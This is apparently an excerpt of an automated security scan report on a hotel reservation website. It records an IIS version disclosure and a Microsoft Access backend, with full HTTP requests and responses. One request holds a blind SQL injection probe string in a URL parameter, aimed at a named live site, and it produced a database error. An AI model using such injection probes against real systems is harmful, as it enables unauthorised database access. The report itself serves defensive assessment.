Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:57:54 GMT
X-Powered-By: ASP.NET
Content-Length: 372
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADAAARA=GNCOLOPAFMIAGCFHLGCODIOO; path=/
Cache-control: private



<HTML>
<HEAD>
<title>Online Reservation</title>

<script type="text/javascript">
if(parent.frames.length!=0) {
window.top.location.replace(document.location.href) }
else {}
</script>
We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:¿p[�»´²¦�bkPÁ¨¦�Á}X���ǯ||²¨�J��¨´¾¨�w�����ǿy��¢»h<br>
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /copy1/webview.asp

/copy1/webview.asp

https://www.superinn.com/copy1/webview.asp?crypt=%C2%BF%7Fp%5B%98%C2%BB%C2%B4%C2%B2%C2%A6%98b%7FkP%C..

Extracted Version

Microsoft-IIS/5.0

Request

GET /copy1/webview.asp?crypt=%C2%BF%7Fp%5B%98%C2%BB%C2%B4%C2%B2%C2%A6%98b%7FkP%C3%81%C2%A8%C2%A6%9A%C3%81%7DX%B2%9A%B9%C7%AF%7C%7C%C2%B2%C2%A8%95J%9B%9D%C2%A8%C2%B4%C2%BE%C2%A8%93w%AE%8D%AF%BD%A7%C7%BFy%84%93%C2%A2%C2%BBh HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:57:54 GMT
X-Powered-By: ASP.NET
Content-Length: 372
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADAAARA=GNCOLOPAFMIAGCFHLGCODIOO; path=/
Cache-control: private



<HTML>
<HEAD>
<title>Online Reservation</title>

<script type="text/javascript">
if(parent.frames.length!=0) {
window.top.location.replace(document.location.href) }
else {}
</script>
We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:¿p[�»´²¦�bkPÁ¨¦�Á}X���ǯ||²¨�J��¨´¾¨�w�����ǿy��¢»h<br>
Microsoft Access Identified

Microsoft Access Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using Microsoft Access as its backend database. This issue is reported for information purposes only.

Impact

This issue is reported as additional information only. There is no direct impact arising from this issue.
- /copy1/webroom.asp

/copy1/webroom.asp CONFIRMED

https://www.superinn.com/copy1/webroom.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7..

Request

GET /copy1/webroom.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&Rnum=-1%20OR%201=1%20AND%20ASC(MID((CHR(78)%26CHR(69)%26CHR(84)%26CHR(83)%26CHR(80)%26CHR(65)%26CHR(82)%26CHR(75)%26CHR(69)%26CHR(82)),5,1))=88%00 HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=HODOLOPAHMABPMFNCAABJGKP
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:06:04 GMT
X-Powered-By: ASP.NET
Content-Length: 1135
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Room Description and Photos</title>
<style>
body {}
A
{
color: #FFFFFF;
TEXT-DECORATION: none
}
A:hover
{
color: #ffffff;
TEXT-DECORATION:none
}
</style>
</head>

<body onload="javascript:window.focus();" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" link='#000000' alink='#000000' vlink='#000000' bgcolor='#ffffff' text='#000000' background='https://www.superinn.com/db/381/webview/'>


<table width="100%" border="0" cellspacing="0" cellpadding="0" bgColor=''>
<Tr>
<td width='0'>
</td>
<td>
<TABLE width="100%" height="20" border="0" cellPadding=0 cellSpacing=0 bgColor=''>
<TBODY>
<TR>
<TD>
<b><font face="Arial, Helvetica, sans-serif" size="2" color='#000000'>&nbsp;&nbsp;&nbsp;&nbsp; <font face="Arial" size=2><p>ADODB.Field</font> <font face="Arial" size=2>error '80020009'</font><p><font face="Arial" size=2>Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.</font><p><font face="Arial" size=2>/copy1/webroom.asp</font><font face="Arial" size=2>, line 0</font>